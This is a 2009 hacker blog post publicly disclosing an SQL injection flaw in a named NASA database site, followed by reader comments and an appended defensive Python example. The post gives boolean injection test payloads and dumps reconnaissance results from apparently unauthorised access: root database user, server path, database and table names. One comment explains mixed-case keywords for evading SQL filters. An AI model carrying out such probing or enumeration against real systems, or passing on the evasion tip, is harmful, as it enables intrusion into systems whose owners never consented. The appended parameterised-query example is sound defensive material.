NASA Full-Disclosure! AGAIN

December 8th, 2009 | TinKode | Posted in MySQL Injection | 9 Comments


 _   _                      _               _
| \ | | __ _ ___  __ _     / \   __ _  __ _(_)_ __
|  \| |/ _` / __|/ _` |   / _ \ / _` |/ _` | | '_ \
| |\  | (_| \__ \ (_| |  / ___ \ (_| | (_| | | | | |
|_| \_|\__,_|___/\__,_| /_/   \_\__, |\__,_|_|_| |_|
                                |___/
              #Full Disclosure... c0de.breaker

#Important
Ok. First of all, the reason I made this SQLi public (even though I had no intention of doing so) is that I found out that somebody else discovered the vulnerable parameter. I found this SQLi 3 months ago.
# Why do I test websites?
Because it is my hobby, and I want to prove that even the big websites, which should be highly secured, can be hacked. This is the reality, and it makes me sad. I feel alright about what I’m doing, because if anyone finds a vulnerability before me, he/she could use it in harmful ways such as: shelling, rooting, backdooring, deleting, etc.

The vulnerable website: http://saif-1.larc.nasa.gov (CEOS Systems Analysis Database)

Testing:
(True) and 1=1--

(False) and 1=2--

Information:

#Version: 5.1.31-community
#User: root@localhost
#Main Database: ceossadb
#Path of MySQL: C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\

Also, magic_quotes_gpc is OFF, and “user” from mysql has all privileges:

Bad…

Other Databases:

#ceossadb
#information_schema
#mysql
#ceosvis

Tables from “ceosvis” database:

#instrument
#takes
#measurement
#contains
#mission

Tables from main Database:

#agency
#alt_names
#cat_measurements
#cat_missions
#cat_series
#cat_wavebands
#ceosdbversion
#constellations
#data_access_links
#db_update_phases
#ecv
#instr
#instr_agencies
#instr_desc
#instr_geometry
#instr_maturity
#instr_mission
#instr_res_swath_temp
#instr_sampling
#instr_status
#instr_status_biz
#instr_technology
#instr_technology_rawdata
#instr_type
#instr_waveband
#mappedor1
#measurement_confidence
#measurement_desc
#measurement_type
#measurementtypesconfidencepilot
#measurementtypespending
#method
#mission_agencies
#mission_status
#missions
#obs_requirments
#orbit_sense
#orbit_type
#requirements
#series
#series_agency
#series_missions
#societal_benefits
#sys_diagrams
#taxonomy
#typeatmosphere
#typereqapplication
#typerequirementsource
#typesmeasurementsconfidencepilot
#wmo_measurement

I made this public because I saw the website down, and I think the administrators will fix the vulnerability once someone reports the problem. (Sorry that I didn’t do this first, if that was the case.)

9 Responses to “NASA Full-Disclosure! AGAIN”

  1. Sorry… but the correct form would be Full-Disclosure… ;)

  2. I only changed the title. I don’t think it matters much. :)

  3. @TinKode,
    Of course, you don’t necessarily need to know English to figure out what the article is about… :D

    It’s just that any moment now the great critics will barge in and start explaining why “Pitagora’s theorem” is wrong, since the correct form would be “Pythagoras’ theorem”… ;)

    P.S. Sorry for the off-topic, and thanks for the article…

  5. I’ll be damned if I can be understanding with people that use improper user rights to connect to the database from the web layer.

    I mean you should only allow normal operations (least privileged account) and deny all others (such as meta-tables access). Pure laziness if you ask me.

    This does NOT mean you shouldn’t secure the web layer by properly sanitizing input.

  6. Why uNiON, not union? :) Is there some difference or what?

  7. Because sometimes UNION and SELECT aren’t filtered, and so you can use uNIOn and sELecT, no matter.
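Added example, not part of the original post or its comments: a sketch of the "properly sanitizing input" point from comment 5 and the keyword-filter question in comments 6 and 7, comparing a concatenated query, a case-sensitive keyword blacklist, and a bound parameter against the post's true/false test. The table, data and function names are constructed, and SQLite stands in for the MySQL backend as an assumption.

```python
import sqlite3

# Constructed sample data; SQLite stands in for the MySQL backend (assumption).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE missions (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO missions VALUES (?, ?)",
                   [(1, "alpha"), (2, "beta")])
    return db

def lookup_concat(db, mission_id):
    """Vulnerable pattern: the request parameter is pasted into the SQL text."""
    sql = "SELECT name FROM missions WHERE id = " + mission_id
    return [row[0] for row in db.execute(sql)]

BLOCKED = ("UNION", "SELECT")  # hypothetical case-sensitive keyword blacklist

def passes_filter(value):
    """True when the blacklist lets the value through."""
    return not any(word in value for word in BLOCKED)

def lookup_blacklist(db, mission_id):
    """Still vulnerable: the filter only sits in front of the concatenation."""
    if not passes_filter(mission_id):
        raise ValueError("blocked keyword")
    return lookup_concat(db, mission_id)

def lookup_bound(db, mission_id):
    """Hardened: accept only decimal digits, then bind the value as a parameter."""
    if not mission_id.isdecimal():
        return []
    cur = db.execute("SELECT name FROM missions WHERE id = ?", (int(mission_id),))
    return [row[0] for row in cur]

def boolean_pair_differs(lookup, db):
    """The post's test: do a true and a false appended condition change the result?"""
    return lookup(db, "1 and 1=1--") != lookup(db, "1 and 1=2--")

if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_concat, lookup_blacklist, lookup_bound):
        print(fn.__name__, "injectable:", boolean_pair_differs(fn, db))
```

Only the bound version treats the whole parameter as data, so the true/false pair and the mixed-case keywords all return the same empty result.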
